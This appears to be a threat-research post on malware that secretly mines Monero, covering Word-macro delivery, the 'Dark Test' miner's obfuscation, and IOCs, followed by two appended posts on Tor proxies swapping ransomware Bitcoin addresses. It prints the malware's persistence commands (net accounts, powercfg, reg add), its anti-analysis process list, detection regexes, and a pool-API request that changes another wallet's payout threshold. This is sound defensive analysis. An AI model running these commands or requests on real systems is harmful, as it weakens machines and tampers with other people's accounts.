In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.
Historical Hash Rate

In analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
Current Hash Rate

We used an online calculator that takes hash rate, power consumption and cost and estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.
Worker ID Payment History

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.
High Volume Calculations

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year, from $13 in January 2017 to over $300 at the time of this article, and at times has approached $500. As long as the cryptocurrency craze continues and the value keeps increasing, every piece of cryptocurrency mined increases in value, which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting onto systems in the first place?

Threats Delivering Miners


Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation.

Email Based


There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. These infections typically work as follows: a user is sent an email with an attachment, usually an archive containing a Word document that downloads the miner via a malicious macro, or a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the included binary is a widely distributed Monero miner executed with the miscreant's worker ID and pool, allowing the attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate.
Example Malicious Email

As you can see, the email contains a Word document which, when opened, looks like the following.
Example Word Document

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.

This image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function:
Highly Obfuscated VBA Macros Using Document_Open()

The macro leads to a call to a Shell command:
Highly Obfuscated VBA Macro VBA.Shell Call

We can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call:
MsgBox for Shell Replacement

This will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:
Office Document Launches a Powershell Indicator in Threat Grid

We also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension:
Portable Executable Image Extension Identification Threat Grid

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid:
xmrig Execution in Threat Grid

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory:
Dynamic Miner Execution in AMP for Endpoint's Device Trajectory

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:
Mining Traffic Classification using Cognitive Threat Analytics

Dark Test Cryptomining Malware


Dark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail.

Dark Test Obfuscation


Dark Test makes use of a packer which, after unpacking, creates a suspended copy of itself using CreateProcessA and overwrites it in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping nSize bytes from the address in lpBuffer.

Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:
Dynamic Method Resolution Using metadataToken Integer

Functions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters:
Runtime Resolved Function Calls using calli

The decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset:
Dark Test String Decryption Function

At the calculated offset, the first four bytes are the offset of the ciphertext and the next four are the length of the string being decrypted. It then iterates over that length in an XOR loop to decrypt the string at the ciphertext offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:
Dark Test String Decryption Function Call

The result, in this case, being the string "-o pool.minexmr.com:4444 -u" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):
Dynamic Miner Activity Command Line Arguments

Runtime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges:
#!/usr/bin/ruby
# Usage: ruby darktest_strings.rb <unpacked Dark Test binary>
fb = File.binread(ARGV[0]).bytes

# The obfuscated length calculation leaves the bytes 106, 242, 28 in the binary;
# they act as an egg marking each runtime-calculated length/offset pair.
EGG = [106, 242, 28].freeze

# Rebuild a 32-bit little-endian integer from four byte values.
def le32(bytes)
  bytes.pack("C*").unpack1("V")
end

(5..fb.length - 4).each do |i|
  next unless fb[i, 3] == EGG

  # Undo the malware's arithmetic: the byte before the egg completes the length,
  # and the four bytes before that hold the XOR-obfuscated seek offset.
  length = (le32([fb[i - 1]] + EGG) - 5) ^ 485648943
  seek_offset_bytes = fb[i - 5, 4]
  seek_offset = (le32(seek_offset_bytes) ^ 2100157544) - 100
  puts "Found length of: #{length}"
  puts "Seek offset bytes: #{seek_offset_bytes.inspect}"

  # Skip tiny strings and offsets that fall outside the file.
  next if length <= 2 || seek_offset < 0 || seek_offset + length > fb.length
  ciphertext = fb[seek_offset, length]

  # Brute-force the single-byte XOR key, keeping only keys whose output is
  # entirely printable ASCII.
  (0x00..0xFF).each do |x|
    result = ciphertext.map { |c| x ^ c }
    next unless result.all? { |b| b.between?(0x20, 0x7E) }
    puts "Found possible XOR key 0x#{x.to_s(16)} for string: #{result.pack("C*")} of length: #{length}"
  end
end

This brute-force approach produces some invalid results, but after manual review it also yields clear-text strings, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online so that it continues mining:
/C net accounts /forcelogoff:no
This prevents forced logoffs from remote administrators.
/C net accounts /maxpwage:unlimited
This sets the maximum password age to unlimited, which in turn prevents password expiry.
/C powercfg /x /standby-timeout-ac 0
This will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle.
/C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f
This sets the screensaver timeout (in seconds) to a huge value, effectively preventing the screensaver from ever starting.
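As an added example (not Talos code), the following Ruby script flags process-creation events whose command line matches the four commands above, and reports a host only when several of them appear together, since any one of them on its own could be an administrator's change. The log lines are constructed for the example and only loosely resemble a Sysmon Event ID 1 or Windows 4688 record; the field names (host=, cmdline=) are assumptions.

```ruby
#!/usr/bin/ruby
# Added example (not Talos code): flag process-creation events whose command
# line matches the "keep the machine awake and logged in" commands Dark Test
# runs before mining, then report hosts where several of them occur together.
# The log format below is constructed for this example (field names assumed).

PERSISTENCE_PATTERNS = {
  "net_forcelogoff_disabled" => /\bnet1?(?:\.exe)?\s+accounts\b.*\/forcelogoff:no\b/i,
  "net_maxpwage_unlimited"   => /\bnet1?(?:\.exe)?\s+accounts\b.*\/maxpwage:unlimited\b/i,
  "powercfg_standby_never"   => /\bpowercfg(?:\.exe)?\b.*\/standby-timeout-ac\s+0\b/i,
  "screensaver_timeout_huge" => /\breg(?:\.exe)?\s+add\b.*\\Control Panel\\Desktop\b.*\/v\s+ScreenSaveTimeOut\b.*\/d\s+(\d{5,})/i,
}.freeze

# Constructed sample events: the four Dark Test commands from one host, plus two
# benign but similar-looking commands from another host.
SAMPLE_LOG = <<~'LOG'
  2018-01-30T10:14:02Z host=WS-042 user=alice cmdline=cmd.exe /C net accounts /forcelogoff:no
  2018-01-30T10:14:02Z host=WS-042 user=alice cmdline=cmd.exe /C net accounts /maxpwage:unlimited
  2018-01-30T10:14:03Z host=WS-042 user=alice cmdline=cmd.exe /C powercfg /x /standby-timeout-ac 0
  2018-01-30T10:14:03Z host=WS-042 user=alice cmdline=cmd.exe /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f
  2018-01-30T11:02:51Z host=WS-007 user=bob cmdline=powercfg /x /standby-timeout-ac 30
  2018-01-30T11:03:10Z host=WS-007 user=bob cmdline=net accounts /forcelogoff:15
LOG

# Return the names of every persistence pattern a command line matches.
def classify(cmdline)
  PERSISTENCE_PATTERNS.select { |_, re| re.match?(cmdline) }.keys
end

# Parse the log and return one record per event that matches at least one pattern.
def scan_log(text)
  text.each_line.each_with_object([]) do |line, out|
    host = line[/\bhost=(\S+)/, 1]
    cmd  = line[/\bcmdline=(.*)$/, 1]
    next unless host && cmd
    hits = classify(cmd.strip)
    out << { host: host, cmdline: cmd.strip, hits: hits } unless hits.empty?
  end
end

# A single match can be an admin's doing; several distinct patterns on one host
# is the Dark Test pre-mining sequence. Returns { host => [pattern names] }.
def suspicious_hosts(text, min_patterns: 2)
  per_host = Hash.new { |h, k| h[k] = [] }
  scan_log(text).each { |rec| per_host[rec[:host]] |= rec[:hits] }
  per_host.select { |_, hits| hits.size >= min_patterns }
end

if __FILE__ == $PROGRAM_NAME
  suspicious_hosts(SAMPLE_LOG).each do |host, hits|
    puts "#{host}: #{hits.join(', ')}"
  end
end
```

Run against the constructed log, only WS-042 is reported, with all four patterns; the two WS-007 lines use the same commands with ordinary values and are ignored.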

Further strings observed are used for anti-analysis; the miner looks for the following process names:
procexp
PROCEXP
pROCESShACKER
ProcessHacker
procexp64
Detect detector!
Clear!
taskmgr

Dark Test Network traffic


Two GET requests are sent to api.ipify.org, which is used for public IP address identification. This is followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URLs for two executable files: bz.exe and cpu.zip
Dynamic Miner Activity Command Line Arguments

Oddly enough, this is not a valid .onion address. It is likely a placeholder returned by the server for this dropper, or the work of a script kiddie who set this up without replacing what the gateway returns to the dropper on request. When searching for this pattern, we came across a pastebin entry containing a number of SQL commands, with Russian comments, for setting up a database holding these domains:
Pastebin SQL Commands

This further suggests that a builder or a distributed gateway is being used. Further searches turned up a number of in-the-wild filenames which correspond to warez:
Dark Test VirusTotal Observed in-the-wild Filenames

This could indicate warez as a possible distribution vector for this malware.

Dark Test Version 2


Throughout the month of November we observed a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary; it contained a statically linked copy instead. Given the attributes shared with the first version of Dark Test, we believe this is a new iteration, written in Visual C++ rather than C#. The binary is shipped inside an NSIS self-extracting installer, which launches unpacking code that writes the payload into a newly spawned suspended process and then resumes its main thread. A notable difference is a more extensive list of anti-analysis strings, which are compared against the running processes enumerated with Process32FirstW:
Anti-Analysis Strings

An interesting addition is vnc.exe, possibly to detect VPS or analysis systems that are being accessed over VNC.

Exploit Kit Based


In addition to the spam campaigns above, Talos has also been observing the RIG exploit kit delivering miners via SmokeLoader over the last couple of months. The actual infection via the exploit kit is standard RIG activity. However, one convenient aspect of mining, from an investigator's point of view, is that it leaves easily trackable elements on the system, namely the 'Worker ID' (the wallet address the miner pays into), as shown below:
Command Line Syntax

Using the Worker ID of:
43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD
we began digging into the hash rate this worker was contributing. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average of 42.5 KH/s, this actor was earning about $85/day.

That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years, without any additional maintenance required by the actor. The only operational costs are those associated with renting the exploit kit and the associated infrastructure. Once victims are compromised, the activity continues, for a cool $31,000 annually.

However, when we looked further back, we found that this campaign has been running on and off over the last six months, with peak hash rates in excess of 100 KH/s.
Historical Hash Rate

The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid-December. It is still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like SmokeLoader.

Active Exploitation


In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits and, most recently, an Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and it can result in significant financial gain.

When you consider threats being delivered to users via email and web, as well as internet-connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much as ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little deeper into the actual mining activity and the systems that have already been mining.

Deeper Dive on Mining and Workers


Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing common to most of the malicious miners we found was the choice of filename. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
Command Line Syntax

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product Immunet.

Mining as a Payload for the Future


Cryptocurrency miner payloads could be among the easiest money makers available for attackers. This is not meant to encourage attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue. Attackers simply have to infect as many systems as possible and execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will likely be just as happy computing 10 KH/s as 500 KH/s. If they have a specific hash rate goal, they can simply continue distributing miners to victims until they reach it.

The sheer volume of infected machines is how attackers measure success with these campaigns. Since financial gain via mining is the mission objective, there is no need to compromise hosts to steal documents, passwords, wallets, or private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload; in the latter case the ransomware is used as a smokescreen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.

Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However, consider 100,000 systems, and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software the means of gain is already in place: control of the victims' system resources and the volume of hashes those resources can generate.

Recurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

Continuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive.

Are Miners Malware?


Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network.

If a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that the legitimate user is performing this task intentionally. The malicious actor is performing the task in exactly the same manner as the legitimate user, but without the system owner's knowledge or consent. The difference is the deception of the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the arsenal the attacker chooses to use, but, much as when PowerShell or PsExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that matters. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and have their computational resources abused to generate revenue for the actors.

Enterprise Impacts


Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

Given the large number of willing users, it may be worth an organization crafting a policy, or adding a section to an existing policy, regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these files should be treated as malware and removed or quarantined as such.

Fails we Found


While investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:
Command Line Syntax

Interestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the infected machines mining Monero that was being sent to the mining application's author, not to the attacker.
Source Code Default Values

In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below:
Mining Fail Example #1
Mining Fail Example #2
Mining Fail Example #3
Mining Fail Example #4

This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure:

"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

Where $WORKER is the 'Worker ID' (the wallet address) being modified, and the amount is given in the pool's atomic units (10^12 per XMR, so 50000000000000 is 50 XMR). This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could differ depending on the pool being used by the adversary.

Conclusion


The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money, and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money from each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system, other than by some occasional slowdown. This increases the time a system stays infected and generating revenue. In many ways it's the exact opposite of ransomware. Ransomware is designed to generate revenue from a victim within a couple of days, and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward.

Coverage


There are different ways to address miners, and there is detection built into Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally, there are a couple of NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment, depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity include, but aren't limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

IOC Section


IP Addresses:


89.248.169[.]136
128.199.86[.]57

Domains:


qyvtls749tio[.]com
youronionlink[.]onion

File Hashes


Improve collaboration to overcome cyber-attack security issues, say transportation security leaders

One of the keys to averting cyber-attacks on critical US transportation infrastructure, such as 2016’s ransomware attack on San Francisco’s transit network, lies in industry-wide collaboration, according to security experts

The post Improve collaboration to overcome cyber-attack security issues, say transportation security leaders appeared first on The Cyber Security Place.

Crypto-Mining: The Next Ransomware

Hackers are opportunistic by nature. As device manufacturers continue to add more CPU cores and gigabytes of RAM to smartphones and tablets as well as enterprise-grade cloud servers, these devices

The post Crypto-Mining: The Next Ransomware appeared first on The Cyber Security Place.

Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded

What do you get when you add Bitcoin, with a TOR network proxy and cybercriminals? Even more cybercrime!

Bitcoin is the preferred cryptocurrency for ransomware payments. Like most cryptocurrencies it is pseudonymous: transactions are public, but wallet addresses are not tied to an identity, which lets the ransoming cybercriminals collect their money while staying safely in the shadows. Even though Bitcoin is the most popular cryptocurrency, the majority of victims do not have a ready cache of Bitcoin to pay a ransom with, so the cybercriminals came up with a process to facilitate these ransom payments.

Payment websites are hosted on the Tor network where victims login, purchase Bitcoin and deposit them into the wallet of the bad actors. Sounds convenient, unless there is another bad actor in the middle. To understand how that happens, we first need to explain the Tor network.

Tor is an acronym based on a software project called The Onion Router. It “[redirects] Internet traffic through a free, worldwide, volunteer overlay network consisting of more than seven thousand relays to conceal a user’s location and usage…“, Tor (anonymity network), Wikipedia. In other words, you must use a Tor client (such as the Tor Browser) to connect to the Tor network; the relays that provide the anonymity are run by volunteers, and a client does not relay other users' traffic unless it is deliberately configured as a relay.

There are many situations where this type of Internet anonymity would be useful: researching a company without alerting them to who is looking, researching a controversial topic without being identified, avoiding oppressive government restrictions or spying, and facilitating Bitcoin payments while hiding the location of the web server. The challenge for the ransomers is that victims are even less likely to be set up with a Tor client than they are to have Bitcoin! To solve this problem, there are individuals who run “Tor proxies.” These proxies are accessible with a regular browser on the Internet so no special software is required. For example, the hidden server on the Tor network might be addressed by hxxps://sketchwebsite.onion which requires a Tor browser to connect. However by entering hxxps://sketchwebsite.onion.to into a regular browser, a connection is made with a “regular server” on the Internet which redirects (proxies) the request to sketchwebsite.onion on your behalf. You can surf the Tor network, and make your Bitcoin payments with no special software required. By design, a proxy takes a connection from one party and passes it to another. This involves looking at the incoming request to understand where it needs to be forwarded. This also creates an opportunity for the proxy to make changes in between.

Proofpoint is the security vendor that identified cybercriminals taking advantage of Tor proxies to steal from victims and the ransoming cybercriminals. They discovered that when victims attempted to connect to the ransomers’ website through a Tor proxy, the criminals operating the proxy made changes to the stream. Instead of the Bitcoin being deposited to the intended ransomer’s digital wallets, the funds were redirected to the proxy operator’s wallet. While you won’t be sympathetic to the ransoming cybercriminals’ loss of revenue, the real problem is that without payment they won’t release the decryption key to the victim. The ransomware victim thought they were paying Bitcoin to the ransomer for the decryption key, but with the man-in-the-middle attack at the Tor proxy they paid for nothing.

Through some very detailed analysis documented here, Proofpoint estimates that approximately 2 BTC have been redirected (around $20,000 at the time they published their article.) It was a notice on the LockeR ransomware payment portal that alerted Proofpoint researchers that something was amiss in the cybercrime underworld:

bitcoin ransomware

“While this is not necessarily a bad thing, it does raise an interesting business problem for ransomware threat actors and practical issues for ransomware victims by further increasing the risk to victims who would resort to paying ransomware ransoms,” Proofpoint researchers said. “This kind of scheme also reflects the broader trend of threat actors of all stripes targeting cryptocurrency theft. Continued volatility in cryptocurrency markets and increasing interest in the Tor network will likely drive further potential abuses of Tor proxies, creating additional risks for new users.”

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alberta Chapter.
 

Pierluigi Paganini

(Security Affairs – Bitcoin, cybercrime)

The post Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded appeared first on Security Affairs.

Bitcoin hijack steals from both ransomware authors AND their victims

Talk about having a bad day…

First you get hit with ransomware, demanding you send a Bitcoin payment to anonymous hackers

Then you realise that you don’t have a secure backup of your files, so you’ll have to pay up to have any hope of getting your files back.

And finally, after you have worked out how to buy yourself some Bitcoins online, and as you are attempting to pay the hackers their ransom… the payment gets diverted to someone else entirely.

In short, your files are still encrypted, and you’ve lost all your money.

That’s the ultimate bad-day scenario being described by security researchers who claim to have identified a scam that both steals from ransomware authors and their victims.

Here’s the background.

It’s not at all unusual for ransomware to present victims with a demand that the ransom be paid via a Tor .onion site on the dark web. Of course, the typical victim of ransomware has probably never been on the dark web, and probably doesn’t have the first clue about how to install the Tor browser.

As a result, they might use a Tor proxy instead. Tor proxy services act as a man-in-the-middle, allowing anybody to simply enter a .onion address into a website – or add a suffix to the URL such as “.to” or “.top” – to have their request completed, with no need to install special software.

Of course, you are putting an enormous amount of trust in the hands of the Tor proxy service that they are not meddling with the information you are seeing – or indeed the data that you are sending.

Fascinatingly, security researchers say that they have uncovered evidence that at least one Tor proxy is interfering with ransomware payments, effectively stealing from the ransomware’s authors and victims alike. According to Proofpoint, ransomware payment webpages are being secretly altered when viewed via the Onion.top Tor-to-web proxy in order to display a different Bitcoin address.

Ransomware such as Sigma, GlobeImposter, and LockeR have all been identified as suffering from a sneaky switcheroo of Bitcoin wallet addresses via the proxy, giving a different payment address than when the same page is viewed via the real Tor browser.

Perhaps it’s no surprise then that some ransomware is actually warning its victims not to use Onion.top.

As always, the best way to avoid the effects of ransomware is not to have your computer or smartphone infected in the first place. Be sure to follow Hot for Security’s tips for reducing the ransomware threat before you become the next victim.
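To make the effect of such a proxy concrete, here is an added Ruby example (not Proofpoint's code, nor from either of the two posts above on the Tor-proxy address swap) that extracts the Bitcoin addresses from the same ransom page as rendered over Tor and as rendered through a Tor-to-web proxy, validates each one with a Base58Check decode, and reports any address the proxy swapped in. Both page renderings and the two wallet addresses are constructed for the example (the addresses are encoded from made-up 20-byte payloads, not real key hashes). The validation step shows why format checking alone cannot catch the swap: the substituted address is just as well-formed as the original, so the only reliable check is comparing the two renderings.

```ruby
#!/usr/bin/ruby
# Added example (not Proofpoint's or either post's code): detect a Tor-to-web
# proxy address swap by diffing the Bitcoin addresses in the same ransom page
# rendered over Tor and rendered through the proxy. Pages and addresses below
# are constructed for the example.
require "digest"

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz".freeze
ADDRESS_RE = /\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b/

# Base58Check: version || payload || first 4 bytes of SHA256(SHA256(version || payload)).
def base58check_encode(version, payload)
  data = [version].pack("C") + payload.b
  bytes = data + Digest::SHA256.digest(Digest::SHA256.digest(data))[0, 4]
  n = bytes.unpack1("H*").to_i(16)
  out = +""
  while n > 0
    n, rem = n.divmod(58)
    out.prepend(B58[rem])
  end
  bytes.each_byte { |b| break unless b.zero?; out.prepend("1") }  # leading 0x00 -> '1'
  out
end

# True only if the string decodes to 25 bytes whose checksum matches, i.e. a
# syntactically valid P2PKH/P2SH address. A swapped-in attacker address passes
# this check just as well as the real one, which is the point of the comparison.
def valid_base58check?(addr)
  return false unless addr.match?(/\A[1-9A-HJ-NP-Za-km-z]{26,35}\z/)
  n = addr.each_char.inject(0) { |acc, c| acc * 58 + B58.index(c) }
  hex = n.to_s(16)
  hex = "0" + hex if hex.length.odd?
  bytes = (("\x00" * addr[/\A1*/].length) + [hex].pack("H*")).b
  return false unless bytes.bytesize == 25
  data, checksum = bytes.byteslice(0, 21), bytes.byteslice(21, 4)
  Digest::SHA256.digest(Digest::SHA256.digest(data))[0, 4] == checksum
end

def payment_addresses(html)
  html.scan(ADDRESS_RE).select { |a| valid_base58check?(a) }.uniq
end

# Addresses seen through the proxy that are absent from the direct Tor rendering.
def address_substitutions(tor_html, proxy_html)
  direct  = payment_addresses(tor_html)
  proxied = payment_addresses(proxy_html)
  { direct: direct, proxied: proxied, swapped: proxied - direct }
end

# Constructed wallets and pages (payloads are arbitrary bytes, not real hashes).
RANSOMER_ADDR = base58check_encode(0x00, "ransomer-wallet-0001")
PROXY_ADDR    = base58check_encode(0x00, "proxyop-wallet-00001")
TOR_PAGE   = "<p>Send 0.5 BTC to <b>#{RANSOMER_ADDR}</b> to get your key.</p>"
PROXY_PAGE = "<p>Send 0.5 BTC to <b>#{PROXY_ADDR}</b> to get your key.</p>"

if __FILE__ == $PROGRAM_NAME
  r = address_substitutions(TOR_PAGE, PROXY_PAGE)
  puts r[:swapped].empty? ? "no substitution" : "swapped in via proxy: #{r[:swapped].join(', ')}"
end
```

In practice the "direct" rendering would come from a real Tor client and the "proxied" one from the .onion.to or .onion.top URL; any address that appears only in the proxied copy is the one the proxy operator inserted.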

